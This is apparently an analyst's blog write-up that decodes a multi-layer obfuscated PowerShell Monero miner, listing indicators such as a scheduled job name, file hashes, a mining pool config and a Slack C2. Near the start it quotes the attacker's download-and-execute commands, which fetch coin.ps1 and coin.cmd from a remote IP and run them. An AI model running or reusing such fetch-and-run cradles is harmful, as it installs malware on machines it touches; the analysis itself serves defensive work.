I came across a APT level cryptominer for Monero (XMR) in a compromised environment, lets take a look.
Decoded 2021-11-06.
First seen 2021-11-06.
Note that there are some related files (found in the zip file below) that was seen on virustotal that is related to a APT detection. The code itself however, there are no trace for so this is the first know public decoding below, enjoy!

Here is a breakdown of the attack/code and how it was obfuscated and what it does.

Before we start
Everything kicked of with a elevated cmd (as SYSTEM) to download coin.ps1.
This was achieved through a exploitation of a vulnerability with the age of less then 20 days since disclosure.

The beginning
After the initial IR and work done, this was the download string executed by the adversary.
"C:\Windows\System32\cmd.exe" /c "powershell.exe -nop -Exec Bypass -C IeX (New-Object Net.WebClient).DownloadString('http://104.168.213[.]31:55555/coin.ps1')

Lets do a wget of coin.ps1 on my linux to see what fish we are dealing with.
$cc = http://104.168.213[.]31:55555/coin.cmd
(New-Object Net.WebClient).DownloadFile($cc, "$env:TMP\coin.cmd")
Start-Process "$env:TMP\coin.cmd

Well well well, we are of to the race in base64! I could see this by experience, a tell was the == in the end.

Layer 3 Obfuscating
Layer 3 due to the fact that we have done coin.ps1 and then coin.cmd as the 2 first.
After removing fillers, reversing the code and decoding base64 we get the following string:

Note that i could identify the last part of the code as IEX due to:
$pshome[21] that comes out as I
$pshome[34] that comes out as E
and then simply adding a +’X’ in the end, resulting in IEX – this stand for invoke-expression in powershell.

Layer 4 Obfuscating
Deobfuscating the string, removing IEX and replacing it with | out-string, made it possible to de-compile the script further.

Layer 5 Obfuscating
Same thing here. IEX happening in start of the script, i removed it and added the | out-string in the end.

Layer 6 Obfuscating
Here we see a githublink containing what seems like binaries but i can still see it ending in IEX.

Layer 7 Obfuscating
Same thing here. IEX, i removed it and added the | out-string in the end.

Layer 8 Obfuscating
Repeat. IEX, i removed it and added the | out-string in the end.

Layer 9 Obfuscating (First readable output – First IOC)
Here we get the first readable output, later it was identified as persistence (scheduled job, not task!) and a new attempt to download the binaries.

From here its obvious two steps, but I focused on the first part of the code, second one comes in Layer 15.
Here we clearly see that first section is a WMI instance (process) that targets DismMSN.exe which at this point is completely unknown to us.
Second part is a scheduled job (Persistence) with name Get-DCDiskSpace and its our first IOC.

First IOC
Here is a powershell string to search for the scheduledjob:
Get-ScheduledJob -name Get-DCDiskSpace

Layer 10 Obfuscating
I chose to continue with the first part from Layer 9, as i wanted to know what DismMSN.exe was and why it was being called. Another github link! Note that its not same as previous one in Layer 6.

Layer 11 Obfuscating
IEX identified and removed from the string and added the | out-string in the end.

Layer 12 Obfuscating
IEX identified and removed from the string and added the | out-string in the end.

Layer 13 Obfuscating
This layer don’t come out as expected when replacing IEX with | out-string.

So I had to thinker and test, trying to separate the lines where I saw . and &-signs (they pipe strings in powershell). It looks like it sets variables and then run the code calling those variables. Ran these lines separately, then the last part and replacing IEX with | out-string.

Layer 14 Obfuscating (Second readable content – Second IOC)
Note how its calling yet ANOTHER github link from the -uri variable and saves it as DismMSN.zip.
It looks however like the -uri variable is not set before the first else variable(? more about that in Layer 20).

DismMSN.zip contains following files:

And we can do the correlation to DismMSN.exe that was called upon in Layer 9.
Additionally, unless you are well traversed in cryptosphere, we can check the config file and see that it’s a Monero (XMR) cryptomining malware:

config.json has some telling content!

"coin": "XMR",
"url": "asia.randomx-hub.miningpoolhub.com:20580",
"user": "flaksdjf.worker",
"pass": "x",

Second IOC
We can also see that it stores these files under %appdata%\DismMSN
This is our second IOC.

Note that DismMSN.exe is not malicious by its own, it sideloads the DismCore.dll in the same directory.
This is not my expertise but DismCore.dll seems to load Update.dat in memory, which triggers xmrig.exe.

Additionally: Hashes for the files in my case

[NAME] [SHA1 base32] [MD5]
WinRing0x64.sys 2JJUBLUOSKTNFH2ZT7XUE2RLYG2SC4UZ 0C0195C48B6B8582FA6F6373032118DA
Update.dat VAZ5DKWFBDFA3KA72VW36PYV4WQ3AE7U 9186D1A534F7923C5B9253223D183A8A
DismCore.dll Z6MEZPOZBGJPAK46G7V45VRJVFZYQRGT 148166ACF1E12169A1BE569770B241F7

Layer 15 Obfuscating
So let go back to Layer 9 and explore the Scheduled job (our first IOC).

Layer 16 Obfuscating
When converted, we find another githublink.

Layer 17 Obfuscating
This one is a little scary, the IEX is not happening as it should, but I can see it before the array.
So I try running this code in my lab without the -jOIN”) value in the end. It spits out nothing so I tried running (( gET-VARiaBle (‘an93’+’x’) -Value)-jOIN”) after it and walla! On to the next step.

Layer 18 Obfuscating
IEX identified in the beginning of the snippet, removed it and added the | out-string in the end gave me this.

Layer 19 Obfuscating
This one is scary as well, I opt to run this in my lab environment. I could not see the IEX but I can see that its setting variables and objects, also doing an invoke in the end. But because this snippet is ran “out of context” of the whole script, i felt i could try – it worked and the output was displayed in the error message in powershell.

Layer 20 Obfuscating (Jackpot!)
Here is the actual code with the correct variable -uri specified. It points towards a slack channel with no authentication. This is the “C2”-server for the attacker.

This is opening up for opsec/offensive security.

Takeaway notes:
This is my first decoding, it was great fun and challenging.
My take from it is that the attack tries (from an already established privileged escalation process) spawn a crypto miner for XMR with resilience and persistence. It also post info to a C2 slack server about status. It seems no control was gained this way.

# @ boi
# 2021-11-06